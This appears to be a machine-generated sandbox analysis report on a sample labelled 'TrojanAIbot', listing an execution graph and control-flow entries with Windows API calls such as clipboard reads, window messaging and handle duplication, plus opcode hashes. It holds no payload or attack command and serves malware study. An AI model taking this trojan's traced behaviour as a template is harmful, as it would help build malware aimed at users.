                                                                                                                                execution_graph 30231 5e564c4 30232 5e564d2 30231->30232 30234 5e56532 30232->30234 30236 5e51c94 30232->30236 30235 5e5659a 30237 5e51c9f 30236->30237 30238 5e5664a CallWindowProcW 30237->30238 30239 5e565f9 30237->30239 30238->30239 30239->30235 30213 313f6c0 30214 313f706 30213->30214 30218 313fc98 30214->30218 30222 313fca8 30214->30222 30215 313f7f3 30219 313fc9c 30218->30219 30226 313e1a0 30219->30226 30223 313fcad 30222->30223 30224 313e1a0 DuplicateHandle 30223->30224 30225 313fcd6 30224->30225 30225->30215 30227 313fd10 DuplicateHandle 30226->30227 30228 313fcd6 30227->30228 30228->30215 30240 5e5ba40 30241 5e5ba45 30240->30241 30245 5e5bd40 30241->30245 30253 5e5bd50 30241->30253 30242 5e5bad8 30246 5e5bd44 30245->30246 30247 5e5bd7c 30246->30247 30248 5e5bf9a 30246->30248 30250 5e5beb6 30247->30250 30265 5e5c313 30247->30265 30271 5e5c340 30247->30271 30261 5e5b710 30248->30261 30250->30242 30254 5e5bd69 30253->30254 30257 5e5bd7c 30253->30257 30255 5e5bf9a 30254->30255 30254->30257 30256 5e5b710 CallWindowProcW 30255->30256 30258 5e5beb6 30256->30258 30257->30258 30259 5e5c340 CallWindowProcW 30257->30259 30260 5e5c313 CallWindowProcW 30257->30260 30258->30242 30259->30258 30260->30258 30262 5e5b71b 30261->30262 30263 5e5c340 CallWindowProcW 30262->30263 30264 5e5c556 30263->30264 30264->30250 30266 5e5c334 30265->30266 30267 5e5c34b 30266->30267 30269 5e5c313 CallWindowProcW 30266->30269 30277 5e5c36f 30266->30277 30267->30250 30268 5e5c358 30268->30250 30269->30268 30272 5e5c352 30271->30272 30273 5e5c34b 30271->30273 30275 5e5c313 CallWindowProcW 30272->30275 30276 5e5c36f CallWindowProcW 30272->30276 30273->30250 30274 5e5c358 30274->30250 30275->30274 30276->30274 30278 5e5c3a0 30277->30278 30279 5e5c37e 30277->30279 30280 5e55980 CallWindowProcW 30278->30280 30282 5e5c38c 30279->30282 30285 5e55980 30279->30285 30284 5e5c3a7 30280->30284 30282->30268 30283 5e5c3c8 30283->30268 30284->30268 30287 5e559cc 30285->30287 30286 5e55c6c 30286->30283 30287->30286 30291 5e5c3e0 30287->30291 30295 5e5c2df 30287->30295 30300 5e5c3d0 30287->30300 30292 5e5c426 30291->30292 30293 5e51c94 CallWindowProcW 30292->30293 30294 5e5c449 30292->30294 30293->30294 30294->30286 30296 5e5c2ea 30295->30296 30297 5e5c35f 30295->30297 30296->30286 30298 5e51c94 CallWindowProcW 30297->30298 30299 5e5c449 30297->30299 30298->30299 30299->30286 30301 5e5c3d4 30300->30301 30302 5e51c94 CallWindowProcW 30301->30302 30303 5e5c449 30301->30303 30302->30303 30303->30286 30304 5e5800c 30305 5e58015 30304->30305 30307 5e58033 30304->30307 30305->30307 30310 5e56890 30305->30310 30308 5e56890 SendMessageW 30307->30308 30309 5e5816c 30307->30309 30308->30309 30311 5e56892 30310->30311 30312 5e568dd 30311->30312 30315 5e5ade8 30311->30315 30335 5e5addb 30311->30335 30312->30307 30318 5e5adeb 30315->30318 30316 5e5af1b 30355 5e52208 30316->30355 30318->30316 30325 5e5aebf 30318->30325 30319 5e5aef0 30360 5e58ef4 30319->30360 30321 5e5af2b 30364 5e58f04 30321->30364 30323 5e5af35 30378 5e58e88 30323->30378 30326 5e52208 SendMessageW 30325->30326 30326->30319 30327 5e5af3d 30328 5e56890 SendMessageW 30327->30328 30329 5e5b047 30327->30329 30331 5e5afed 30328->30331 30382 5e5a8c0 30329->30382 30386 5e5a8d0 30329->30386 30330 5e5b0bc 30331->30329 30390 5e58f64 30331->30390 30338 5e5ade0 30335->30338 30336 5e5af1b 30337 5e52208 SendMessageW 30336->30337 30339 5e5aef0 30337->30339 30338->30336 30340 5e5aebf 30338->30340 30341 5e58ef4 SendMessageW 30339->30341 30346 5e52208 SendMessageW 30340->30346 30342 5e5af2b 30341->30342 30343 5e58f04 SendMessageW 30342->30343 30344 5e5af35 30343->30344 30345 5e58e88 SendMessageW 30344->30345 30347 5e5af3d 30345->30347 30346->30339 30348 5e56890 SendMessageW 30347->30348 30349 5e5b047 30347->30349 30351 5e5afed 30348->30351 30353 5e5a8c0 SendMessageW 30349->30353 30354 5e5a8d0 SendMessageW 30349->30354 30350 5e5b0bc 30351->30349 30352 5e58f64 SendMessageW 30351->30352 30352->30349 30353->30350 30354->30350 30357 5e52239 30355->30357 30359 5e52347 30355->30359 30356 5e52245 30356->30319 30357->30356 30397 5e519f0 SendMessageW 30357->30397 30359->30319 30361 5e58eff 30360->30361 30362 5e56890 SendMessageW 30361->30362 30363 5e5d9f0 30361->30363 30362->30363 30363->30321 30370 5e58f0f 30364->30370 30365 5e5dfa8 30365->30323 30366 5e5df21 30367 5e5df5a 30366->30367 30368 5e58f64 SendMessageW 30366->30368 30369 5e58f64 SendMessageW 30367->30369 30372 5e5df4c 30368->30372 30373 5e5df66 30369->30373 30370->30365 30370->30366 30371 5e5df74 30370->30371 30404 5e5ba14 SendMessageW 30370->30404 30371->30365 30377 5e56890 SendMessageW 30371->30377 30398 5e5da44 30372->30398 30375 5e5da44 SendMessageW 30373->30375 30375->30371 30377->30365 30379 5e58e93 30378->30379 30380 5e56890 SendMessageW 30379->30380 30381 5e5a914 30379->30381 30380->30381 30381->30327 30383 5e5a8c4 30382->30383 30384 5e58e88 SendMessageW 30383->30384 30385 5e5a8e4 30384->30385 30385->30330 30387 5e5a8d2 30386->30387 30388 5e58e88 SendMessageW 30387->30388 30389 5e5a8e4 30388->30389 30389->30330 30392 5e58f6f 30390->30392 30391 5e5fbee 30391->30329 30392->30391 30393 5e56890 SendMessageW 30392->30393 30394 5e5fc48 30393->30394 30395 5e5e460 SendMessageW 30394->30395 30396 5e5fc59 30395->30396 30396->30329 30397->30359 30399 5e5da4f 30398->30399 30400 5e56890 SendMessageW 30399->30400 30401 5e5fc48 30400->30401 30405 5e5e460 30401->30405 30404->30366 30406 5e5fc70 SendMessageW 30405->30406 30407 5e5fc59 30406->30407 30407->30367 30408 3135238 30409 3135239 30408->30409 30415 3134e0c 30409->30415 30411 31352be 30422 67716b8 30411->30422 30426 6771660 30411->30426 30416 3134e17 30415->30416 30430 3136dc4 30416->30430 30418 3137a04 30421 5e56890 SendMessageW 30418->30421 30434 5e56880 30418->30434 30419 3137abe 30419->30411 30421->30419 30423 67716ba 30422->30423 30468 67712f4 30423->30468 30427 6771665 30426->30427 30428 67712f4 2 API calls 30427->30428 30429 31352c5 30428->30429 30431 3136dcf 30430->30431 30439 3136e30 30431->30439 30433 3137b6d 30433->30418 30435 5e56884 30434->30435 30436 5e568dd 30435->30436 30437 5e5ade8 SendMessageW 30435->30437 30438 5e5addb SendMessageW 30435->30438 30436->30419 30437->30436 30438->30436 30440 3136e3b 30439->30440 30443 3136e60 30440->30443 30442 3137c42 30442->30433 30444 3136e6b 30443->30444 30447 3136e90 30444->30447 30446 3137d54 30446->30442 30448 3136e9b 30447->30448 30449 313ad3b 30448->30449 30451 313d2f8 30448->30451 30449->30446 30455 313d321 30451->30455 30459 313d330 30451->30459 30452 313d30e 30452->30449 30456 313d330 30455->30456 30463 313d418 30456->30463 30457 313d33f 30457->30452 30460 313d335 30459->30460 30462 313d418 GetModuleHandleW 30460->30462 30461 313d33f 30461->30452 30462->30461 30464 313d428 30463->30464 30465 313d45c 30464->30465 30466 313d660 GetModuleHandleW 30464->30466 30465->30457 30467 313d68d 30466->30467 30467->30457 30469 67712ff 30468->30469 30472 6771334 30469->30472 30471 67717ad 30471->30471 30477 677133f 30472->30477 30473 6771a28 30478 6771a53 30473->30478 30481 67715a8 30473->30481 30475 67715a8 OleInitialize 30475->30473 30476 6771a40 30485 6773360 30476->30485 30489 6773350 30476->30489 30477->30473 30477->30475 30477->30478 30478->30471 30482 67715b3 30481->30482 30484 6772df9 30482->30484 30493 6772194 30482->30493 30484->30476 30487 67733c5 30485->30487 30488 6773412 30487->30488 30500 677225c 30487->30500 30488->30478 30491 6773354 30489->30491 30490 677225c DispatchMessageW 30490->30491 30491->30490 30492 6773412 30491->30492 30492->30478 30494 677219f 30493->30494 30495 6773113 30494->30495 30497 67721b0 30494->30497 30495->30484 30498 6773148 OleInitialize 30497->30498 30499 67731ac 30498->30499 30499->30495 30501 67740c8 DispatchMessageW 30500->30501 30502 6774134 30501->30502 30502->30487 30209 5e5d528 30210 5e5d570 SetWindowTextW 30209->30210 30211 5e5d56a 30209->30211 30212 5e5d594 30210->30212 30211->30210 30229 5e5f8f8 CreateIconFromResourceEx 30230 5e5f976 30229->30230 30503 5e59108 30506 5e58cd8 30503->30506 30505 5e5911f 30507 5e58ce3 30506->30507 30508 5e591d8 30507->30508 30512 5e591e9 30507->30512 30517 5e591f8 30507->30517 30508->30505 30509 5e591a2 30509->30505 30514 5e591ec 30512->30514 30515 5e5943d 30514->30515 30522 5e59659 30514->30522 30515->30509 30518 5e591fa 30517->30518 30520 5e5943d 30518->30520 30521 5e59659 SendMessageW 30518->30521 30519 5e59473 30519->30509 30520->30509 30521->30519 30523 5e5965c 30522->30523 30524 5e5971e 30523->30524 30525 5e56890 SendMessageW 30523->30525 30525->30524 30526 5e56718 30527 5e56728 30526->30527 30531 5e5d478 30527->30531 30537 5e5d46b 30527->30537 30528 5e56751 30532 5e5d47d 30531->30532 30543 5e57d60 30532->30543 30534 5e5d502 30555 5e5b930 30534->30555 30536 5e5d509 30536->30528 30538 5e5d478 30537->30538 30539 5e57d60 SendMessageW 30538->30539 30540 5e5d502 30539->30540 30541 5e5b930 SendMessageW 30540->30541 30542 5e5d509 30541->30542 30542->30528 30544 5e57d65 30543->30544 30554 5e57fc4 30544->30554 30565 5e5798c 30544->30565 30546 5e56890 SendMessageW 30547 5e5816c 30546->30547 30547->30534 30548 5e57e45 30549 5e56890 SendMessageW 30548->30549 30553 5e57eed 30548->30553 30550 5e57eb7 30549->30550 30551 5e56890 SendMessageW 30550->30551 30551->30553 30552 5e56890 SendMessageW 30552->30554 30553->30552 30554->30546 30554->30547 30556 5e5b93b 30555->30556 30557 5e5d767 30556->30557 30558 5e5d72f 30556->30558 30564 5e5d736 30556->30564 30560 5e5d78c 30557->30560 30561 5e5d7b8 30557->30561 30559 5e56890 SendMessageW 30558->30559 30559->30564 30562 5e56890 SendMessageW 30560->30562 30563 5e56890 SendMessageW 30561->30563 30562->30564 30563->30564 30564->30536 30568 5e57997 30565->30568 30566 5e56890 SendMessageW 30567 5e582c9 30566->30567 30567->30566 30570 5e58307 30567->30570 30568->30567 30569 5e56890 SendMessageW 30568->30569 30568->30570 30569->30567 30570->30548 30571 6774848 30572 67748a2 OleGetClipboard 30571->30572 30573 67748e2 30572->30573

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 39 313d418-313d426 40 313d428-313d42c 39->40 41 313d42d-313d437 39->41 40->41 42 313d463-313d467 41->42 43 313d439-313d446 call 313c720 41->43 44 313d47b-313d4bc 42->44 45 313d469-313d473 42->45 50 313d448 43->50 51 313d45c 43->51 52 313d4c9-313d4d7 44->52 53 313d4be-313d4c6 44->53 45->44 96 313d44e call 313d6b0 50->96 97 313d44e call 313d6c0 50->97 51->42 54 313d4fb-313d4fd 52->54 55 313d4d9-313d4de 52->55 53->52 57 313d500-313d507 54->57 58 313d4e0-313d4e7 call 313c72c 55->58 59 313d4e9 55->59 56 313d454-313d456 56->51 60 313d598-313d658 56->60 61 313d514-313d51b 57->61 62 313d509-313d511 57->62 64 313d4eb-313d4f9 58->64 59->64 91 313d660-313d68b GetModuleHandleW 60->91 92 313d65a-313d65d 60->92 65 313d528-313d531 call 313c73c 61->65 66 313d51d-313d525 61->66 62->61 64->57 72 313d533-313d53b 65->72 73 313d53e-313d543 65->73 66->65 72->73 74 313d561-313d56e 73->74 75 313d545-313d54c 73->75 81 313d591-313d597 74->81 82 313d570-313d58e 74->82 75->74 77 313d54e-313d55e call 313c74c call 313c75c 75->77 77->74 82->81 93 313d694-313d6a8 91->93 94 313d68d-313d693 91->94 92->91 94->93 96->56 97->56
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 36f8e77f74cb455e4d1c7401099872a1b72ce6fea362142e3ff2475a0ea95ed0
                                                                                                                                • Instruction ID: e1c8a63e3b7ca86747f4825032e8c0479d5efb93c828423dd86ddda83b80da9c
                                                                                                                                • Opcode Fuzzy Hash: 36f8e77f74cb455e4d1c7401099872a1b72ce6fea362142e3ff2475a0ea95ed0
                                                                                                                                • Instruction Fuzzy Hash: 698147B0A00B458FDB24DF29E44479ABBF5FF89704F04896DD48ADBA50DB74E849CB90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 98 5e51c94-5e565ec 102 5e565f2-5e565f7 98->102 103 5e5669c-5e566bc call 5e51b6c 98->103 105 5e565f9-5e56630 102->105 106 5e5664a-5e56682 CallWindowProcW 102->106 110 5e566bf-5e566cc 103->110 112 5e56632-5e56638 105->112 113 5e56639-5e56648 105->113 107 5e56684-5e5668a 106->107 108 5e5668b-5e5669a 106->108 107->108 108->110 112->113 113->110
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E56671
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                • Opcode ID: cb72426845f7c0bf21c8de2258ec40f6d999e64991d2510aaa2f49984a19f86a
                                                                                                                                • Instruction ID: 09eac3610c7964b00fa61cc3cd4cfff140c1edd142ed8299f5655ce99489d540
                                                                                                                                • Opcode Fuzzy Hash: cb72426845f7c0bf21c8de2258ec40f6d999e64991d2510aaa2f49984a19f86a
                                                                                                                                • Instruction Fuzzy Hash: 2941FAB4900305DFDB14CF95C488AAABBF6FB88314F148459D959AB321D775A845CFA0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 116 5e5f898-5e5f8bf call 5e5e41c
                                                                                                                                APIs
                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05E5F967
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromIconResource
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3668623891-0
                                                                                                                                • Opcode ID: 449357f2442471d4f48f74525dd6f0b75777fa1adc6708c59292453eb8832ebb
                                                                                                                                • Instruction ID: 5cc694962af6a63d93831888037e76b59a589bf12cdcb7fbe9a6b00805bc3347
                                                                                                                                • Opcode Fuzzy Hash: 449357f2442471d4f48f74525dd6f0b75777fa1adc6708c59292453eb8832ebb
                                                                                                                                • Instruction Fuzzy Hash: BA31B271905389DFDB12CFA9C804ADEBFF5AF49310F14809BE994AB251C3359854DFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 119 677483c-6774842 120 6774844-6774846 119->120 121 677484a-6774898 119->121 120->121 122 67748a2-67748e0 OleGetClipboard 121->122 123 67748e2-67748e8 122->123 124 67748e9-67748fa 122->124 123->124 126 6774904-6774937 124->126 129 6774947 126->129 130 6774939-677493d 126->130 132 6774948 129->132 130->129 131 677493f 130->131 131->129 132->132
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: 9b153bf162163adeb7ea1dabfd5c6165524f5e64bfd99311a12c38e97e16443c
                                                                                                                                • Instruction ID: 55d666fff5d23508f07fc2f40c51d085e343d455b3d4830a8e79a613c675ebe7
                                                                                                                                • Opcode Fuzzy Hash: 9b153bf162163adeb7ea1dabfd5c6165524f5e64bfd99311a12c38e97e16443c
                                                                                                                                • Instruction Fuzzy Hash: 4831F0B0D01248DFDB54CF99C984B9EBBF5AF48714F208059E044AB294D7B89945CF65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 133 6774848-67748e0 OleGetClipboard 135 67748e2-67748e8 133->135 136 67748e9-67748fa 133->136 135->136 138 6774904-6774937 136->138 141 6774947 138->141 142 6774939-677493d 138->142 144 6774948 141->144 142->141 143 677493f 142->143 143->141 144->144
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: f227194b932b83b2522744a8b9b4fb64420bf451464ddf3b5f9251307db9a47e
                                                                                                                                • Instruction ID: 1b4b85b9ee3e1889855e5d593044617f64d077e49b6cdb5a4fa8b2c1d4a7ad9d
                                                                                                                                • Opcode Fuzzy Hash: f227194b932b83b2522744a8b9b4fb64420bf451464ddf3b5f9251307db9a47e
                                                                                                                                • Instruction Fuzzy Hash: 7731EEB0D01348DFDB64CF99C984B9EBBF5AF48714F208059E408AB294DBB4A945CFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 145 313e1a0-313fda4 DuplicateHandle 147 313fda6-313fdac 145->147 148 313fdad-313fdca 145->148 147->148
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313FCD6,?,?,?,?,?), ref: 0313FD97
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 6e818f2838b22877fe7ad1171a522b7627aaaeb0548de43c64d76ca047927767
                                                                                                                                • Instruction ID: 88a522ef0ef1309514a692a1c8d1c571652f93d9a5d1de26b3fc61b8a07e211f
                                                                                                                                • Opcode Fuzzy Hash: 6e818f2838b22877fe7ad1171a522b7627aaaeb0548de43c64d76ca047927767
                                                                                                                                • Instruction Fuzzy Hash: 9321E5B5D002499FDB10CFAAD884AEEFBF8EB48310F14841AE914A7351D374A955CFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 151 313fd09-313fda4 DuplicateHandle 152 313fda6-313fdac 151->152 153 313fdad-313fdca 151->153 152->153
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313FCD6,?,?,?,?,?), ref: 0313FD97
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 08690ccc1b3d826512d097bbf93a8bc1320ade19dedeeb98bf2fcec63f0b33e2
                                                                                                                                • Instruction ID: e122b5650ff65a07f3bb200c3a922ac9b3edd4fdbe5bf994eb04fc4ebfe5d46b
                                                                                                                                • Opcode Fuzzy Hash: 08690ccc1b3d826512d097bbf93a8bc1320ade19dedeeb98bf2fcec63f0b33e2
                                                                                                                                • Instruction Fuzzy Hash: 6221FFB5C00248AFDB10CFAAD984AEEBBF4AB48210F14841AE958A3250C378A940CF65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 156 5e5d520-5e5d521 157 5e5d594-5e5d59f 156->157 158 5e5d523-5e5d568 156->158 161 5e5d5a1-5e5d5a7 157->161 162 5e5d5a8-5e5d5c9 157->162 159 5e5d570-5e5d592 SetWindowTextW 158->159 160 5e5d56a-5e5d56d 158->160 159->157 160->159 161->162
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 05E5D592
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: 22cadf0c9ef1d6fb119022e241ce0424fd81bd1e9b1f737642fcbd57ec458ca4
                                                                                                                                • Instruction ID: 81db911fdfcd105337b12fe38669b4b94c3277c48e0957b4d41dedf8aeff8050
                                                                                                                                • Opcode Fuzzy Hash: 22cadf0c9ef1d6fb119022e241ce0424fd81bd1e9b1f737642fcbd57ec458ca4
                                                                                                                                • Instruction Fuzzy Hash: 1D2106B6900249CFDB14CF9AC944BDEFBF4AF88324F14842AD899A7650D378A645CF61

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 164 5e5d528-5e5d568 165 5e5d570-5e5d592 SetWindowTextW 164->165 166 5e5d56a-5e5d56d 164->166 167 5e5d594-5e5d59f 165->167 166->165 168 5e5d5a1-5e5d5a7 167->168 169 5e5d5a8-5e5d5c9 167->169 168->169
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 05E5D592
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: c8360e0cd372f560e2393b1202478b1111028db578995e6d18f3b7eb69cea58a
                                                                                                                                • Instruction ID: e3fe37d5ab7390ad389b885514fceed63a26b0b2671bde92b8d9c8d58972295a
                                                                                                                                • Opcode Fuzzy Hash: c8360e0cd372f560e2393b1202478b1111028db578995e6d18f3b7eb69cea58a
                                                                                                                                • Instruction Fuzzy Hash: 011117B1C002498FDB14CF9AC844BDEFBF4EF48324F10841AD859A3250D374A645CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 171 5e5f8f8-5e5f974 CreateIconFromResourceEx 172 5e5f976-5e5f97c 171->172 173 5e5f97d-5e5f99a 171->173 172->173
                                                                                                                                APIs
                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05E5F967
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromIconResource
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3668623891-0
                                                                                                                                • Opcode ID: c7048f1b6637b1e4365c3ab069b0504520e423af6f3c8692f633e8fe35420fc2
                                                                                                                                • Instruction ID: 921e7988430858d383c710183f37443e0116a66fafea038c62202a3dcdc03d4f
                                                                                                                                • Opcode Fuzzy Hash: c7048f1b6637b1e4365c3ab069b0504520e423af6f3c8692f633e8fe35420fc2
                                                                                                                                • Instruction Fuzzy Hash: 211134B28003499FDB10CFAAD844BDEBFF8EB48320F14841AE954A7250C375A950DFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 176 5e5fc68-5e5fc6a 177 5e5fc72-5e5fcda SendMessageW 176->177 178 5e5fc6c-5e5fc6e 176->178 179 5e5fce3-5e5fcf7 177->179 180 5e5fcdc-5e5fce2 177->180 178->177 180->179
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05E5FCCD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 8b3f29d97fd1a8daf28191d9d7ba524fa98c8874eb01ca207c81beeec222eaea
                                                                                                                                • Instruction ID: b55759e47ab27e4c038e5cd444aebf0561cedc97ac8ce1ac4e57386e47d434ed
                                                                                                                                • Opcode Fuzzy Hash: 8b3f29d97fd1a8daf28191d9d7ba524fa98c8874eb01ca207c81beeec222eaea
                                                                                                                                • Instruction Fuzzy Hash: C41125B58002488FDB10CF9AD845BEEBBF4EB48320F10881AD969A7200C378A544CFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 182 313d618-313d658 183 313d660-313d68b GetModuleHandleW 182->183 184 313d65a-313d65d 182->184 185 313d694-313d6a8 183->185 186 313d68d-313d693 183->186 184->183 186->185
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0313D67E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 2a29909370a508dd33a3550f508a2a28eac8f2868b332cb71c35ba1457472ab1
                                                                                                                                • Instruction ID: a2daf70d6892b2511022d1a8482ccbbe4a0874453a67f3800ffe971ad4159518
                                                                                                                                • Opcode Fuzzy Hash: 2a29909370a508dd33a3550f508a2a28eac8f2868b332cb71c35ba1457472ab1
                                                                                                                                • Instruction Fuzzy Hash: 491110B5C007498FCB10DF9AD844BDEFBF4EF88224F14842AD829A7210C379A545CFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 188 5e5e460-5e5fcda SendMessageW 190 5e5fce3-5e5fcf7 188->190 191 5e5fcdc-5e5fce2 188->191 191->190
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05E5FCCD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 5fae0f0a258ed55784abb97a9864796f963a54d1f1f51a278c605e9acc7c081c
                                                                                                                                • Instruction ID: 499771a59a2482c69cf9018e4130b5c459a628e77f9da75a22d9b931b70d2166
                                                                                                                                • Opcode Fuzzy Hash: 5fae0f0a258ed55784abb97a9864796f963a54d1f1f51a278c605e9acc7c081c
